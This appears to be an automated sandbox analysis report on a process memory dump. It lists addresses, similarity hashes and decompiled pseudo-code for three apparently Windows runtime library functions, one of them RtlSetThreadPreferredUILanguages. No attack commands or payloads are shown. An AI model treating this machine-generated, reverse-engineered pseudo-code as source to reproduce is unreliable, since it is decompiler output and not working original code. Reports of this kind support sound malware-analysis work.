0x02b0528a
0x02b0528f
0x02b05294
0x00000000
0x00000000
0x02b0529a
0x02b0529c
0x02b0529e
0x02b0529e
0x02b052a4
0x02b052b0
0x00000000
0x00000000
0x02b052ba
0x02b052bc
0x02b052bc
0x02b052d4
0x02b052d9
0x02b052dc
0x02b052e1
0x00000000
0x00000000
0x02b052e7
0x02b052f4
0x00000000
0x02b052f4
0x02b05270
0x00000000
0x02b05270
0x02b051fc
0x02b051fd
0x02b05202
0x02b05203
0x02b05205
0x02b0520a
0x02b0520f
0x00000000
0x00000000
0x02b0521b
0x02b05226
0x02b0522b
0x02b0521d
0x02b0521d
0x02b05222
0x02b05222
0x02b0522d
0x00000000

Strings

Legacy, xrefs: 02B05226
UEFI, xrefs: 02B0521D

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 230f82cca789086b0a4cdba89c2ebb43454052f103bfdca42b8953186f0006f5
Instruction ID: 08486bb97e3d3d54baec004e077e0473a354b46983ae724d570271898a60b3ec
Opcode Fuzzy Hash: 230f82cca789086b0a4cdba89c2ebb43454052f103bfdca42b8953186f0006f5
Instruction Fuzzy Hash: 95518071A406089FDB25DFA8C980BADBBF9FF48704F5484ADE54AEB691DB719900CF10

Uniqueness

Uniqueness Score: -1.00%

Function 02A8B171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E02A8B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x2b5f7a8);
				E02ADD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E02ADD130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E02ACD000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E02ACF3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L02ADDEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E02ACB280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E02ACB7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E02ACE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E02ACA890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x02a8b171
0x02a8b171
0x02a8b171
0x02a8b171
0x02a8b171
0x02a8b176
0x02a8b17b
0x02a8b180
0x02a8b186
0x02a8b18f
0x02a8b198
0x02a8b1a4
0x02a8b1aa
0x02ae4802
0x02ae4802
0x02ae4805
0x02ae480c
0x02ae480e
0x02a8b1d1
0x02a8b1d3
0x02a8b1de
0x02a8b1de
0x02ae4817
0x02ae481e
0x02ae4820
0x02ae4822
0x02ae4822
0x02ae4824
0x02ae4824
0x02ae482a
0x00000000
0x00000000
0x02ae4835
0x02ae483a
0x02ae483d
0x02ae483f
0x02ae4842
0x02ae4842
0x02ae4842
0x02ae4846
0x02ae484c
0x02ae484e
0x02ae4851
0x02ae4851
0x02ae4853
0x02ae4854
0x02ae4854
0x02ae4858
0x02ae485a
0x02ae485a
0x02ae485d
0x02ae485f
0x02ae4861
0x02ae4861
0x02ae4866
0x02ae486b
0x02ae486e
0x02ae4871
0x02ae4876
0x02ae4876
0x02ae4878
0x02ae487b
0x02ae4884
0x02ae4884
0x00000000
0x02ae487d
0x02ae487d
0x02ae4882
0x02ae4889
0x02ae4889
0x02ae488f
0x02ae4891
0x02ae48e0
0x02ae48e2
0x02ae48e4
0x02ae48e4
0x02ae48e7
0x02ae48e7
0x02ae48ed
0x02ae48f4
0x02ae48f6
0x02ae4951
0x02ae4951
0x02ae4953
0x02ae4953
0x02ae4956
0x02ae4956
0x02ae4958
0x02ae4959
0x02ae4959
0x02ae495d
0x02ae495d
0x02ae495f
0x02ae495f
0x02ae4965
0x02ae4969
0x02ae49ba
0x02ae49ba
0x02ae49c1
0x02ae49c5
0x02ae49cc
0x02ae49d4
0x02ae49d7
0x02ae49da
0x02ae49e4
0x02ae49e5
0x02ae49f3
0x02ae4a02
0x00000000
0x02ae4a02
0x02ae4972
0x02ae4974
0x00000000
0x00000000
0x02ae4976
0x02ae4979
0x02ae4982
0x02ae4983
0x02ae4984
0x02ae498b
0x02ae498d
0x02ae4991
0x02ae4993
0x02ae4999
0x02ae499d
0x02ae49a2
0x02ae49a2
0x02ae49a2
0x02ae4999
0x02ae49ac
0x00000000
0x02ae49b3
0x02ae48f8
0x02ae48fe
0x00000000
0x00000000
0x00000000
0x02ae48fe
0x02ae4895
0x02ae489c
0x02ae48ad
0x02ae48b2
0x02ae48b5
0x02ae48b7
0x02ae48ba
0x02ae48bc
0x02ae48c6
0x02ae48c6
0x02ae48cb
0x02ae48d1
0x02ae48d4
0x02ae48d8
0x02ae48d8
0x00000000
0x02ae48d8
0x02ae48be
0x02ae48c0
0x00000000
0x00000000
0x02ae48c2
0x00000000
0x00000000
0x00000000
0x02ae48c4
0x00000000
0x02ae4882
0x02ae487b
0x02ae4904
0x02ae4906
0x00000000
0x00000000
0x02ae4908
0x02ae490e
0x00000000
0x00000000
0x02ae4910
0x02ae4917
0x02ae4917
0x00000000
0x02ae4917
0x02a8b1ba
0x02ae47f9
0x02ae47fc
0x00000000
0x00000000
0x00000000
0x02ae47fc
0x02a8b1c0
0x02a8b1c0
0x02a8b1c3
0x02a8b1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 02AE48AD

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: 6dcd09bded0bd6670c805ffe0f0dba768a02eed1118009d916d4a82d84f41945
Instruction ID: 646e66a75ec53471d6b67b92fe16f9cdd3552108626cbc229d3369378a0dc851
Opcode Fuzzy Hash: 6dcd09bded0bd6670c805ffe0f0dba768a02eed1118009d916d4a82d84f41945
Instruction Fuzzy Hash: A151E371D002998EDF30DF64C985BBEBBB5BF08714F2041ADD86AAB281DB754946CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02AAB944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E02AAB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x2b7d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E02AA7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E02B58CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E02AC9E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E02ACB640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E02ACCE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E02AA7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E02B58F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E02ACAF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x2b78628; // 0x0
								_v68 = _t77;
								_t78 =  *0x2b7862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x2b78628; // 0x0
							_t116 =  *0x2b7862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x02aab94c
0x02aab956
0x02aab95c
0x02aab95e
0x02aab964
0x02aab969
0x02aab96d
0x02aab96d
0x02aab970
0x02aab974
0x02aab97a
0x02aabadf
0x02aabadf
0x02aabae2
0x02aabae4
0x02aabae6
0x02aabaf0
0x02af2cb8
0x02aabaf6
0x02aabaf6
0x02aabaf6
0x02aabafd
0x02aabb1f
0x02aabb1f
0x02aabaff
0x02aabb00
0x02aabb00
0x02aabb03
0x02aabb03
0x02aabacb
0x02aabacf
0x02aabad0
0x02aabad1
0x02aabadc
0x02aabadc
0x02aab980
0x02aab980
0x02aab988
0x02aab98b
0x02aab98d
0x02aab990
0x02aab993
0x02aab999
0x02aab99b
0x02aab9a1
0x02aab9a5
0x02aab9aa
0x02aab9b0
0x02aab9bb
0x02aab9c0
0x02aab9c3
0x02aab9ca
0x02aab9cc
0x02aab9cf
0x02aab9d3
0x02aab9d7
0x02aaba94
0x02aaba94
0x02aaba98
0x02aabaa3
0x02af2ccb
0x02aabaa9
0x02aabaa9
0x02aabaa9
0x02aabab1
0x02af2cd5
0x02af2cdd
0x02af2cdd
0x02aababb
0x02aababc
0x02aabac2
0x02aabac3
0x02aabac3
0x02aabac6
0x00000000
0x02aab9dd
0x02aab9dd
0x02aab9e7
0x02aab9e7
0x02aab9ec
0x02aab9ec
0x02aab9f1
0x02aab9f5
0x02aab9fa
0x02aaba00
0x02aaba0c
0x02aaba10
0x02aaba10
0x02aaba12
0x02aaba18
0x00000000
0x00000000
0x02aabb26
0x02aabb26
0x02aaba1e
0x02aaba1e
0x02aaba23
0x02aaba25
0x02aaba2c
0x02aaba30
0x02aaba35
0x02aaba35
0x02aaba41
0x02aaba46
0x02aaba4c
0x02aaba50
0x02aaba54
0x02aaba6a
0x02aaba6e
0x02aaba70
0x02aaba74
0x02aaba78
0x02aaba7a
0x02aaba7c
0x02aaba8e
0x02aaba90
0x02aaba92
0x02aabb14
0x02aabb14
0x02aabb16
0x02aabb16
0x00000000
0x02aaba7c
0x02aabb0a
0x02aabb0d
0x00000000
0x00000000
0x00000000
0x02aabb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02AAB9A5

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 8863980e9caad6b38c113ca2a5601f69eeaf1c97c708745836ba6ad8be79a8e7
Instruction ID: df73f90cdc9a681131ee6e7f08e9c156d2275959b30dd089da929e21c5d2dd8d
Opcode Fuzzy Hash: 8863980e9caad6b38c113ca2a5601f69eeaf1c97c708745836ba6ad8be79a8e7
Instruction Fuzzy Hash: 85513871A09341CFC720CF69C5D0A2ABBF5BF98658F144D6EE98687354DB31E844CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 02ABFAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E02ABFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E02A9EEF0(0x2b77b60);
					_t134 =  *0x2b77b84; // 0x771c7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x2b77b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2b77b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E02A96D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E02A976E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E02B28938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E02A8B150();
													}
													_t116 = E02B26D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E02A975CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x2b78638; // 0x0
																	_t122 = L02A938A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E02A976E2(_t154);
																			goto L41;
																		}
																	} else {
																		E02A976E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L02ABFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L02A970F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E02ABFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E02ABFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E02ABFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E02ABFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E02ABFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x2b77b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x2b77b84 = _t75;
						_t73 = E02A9EB70(_t134, 0x2b77b60);
						if( *0x2b77b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E02A9FF60( *0x2b77b20);
							}
						}
						goto L5;
					}
				}
			}

0x02abfab0
0x02abfab2
0x02abfab3
0x02abfab4
0x02abfabc
0x02abfac0
0x02abfb14
0x02abfb17
0x02abfac2
0x02abfac8
0x02abfacd
0x02abfad3
0x02abfad3
0x02abfadd
0x02abfb18
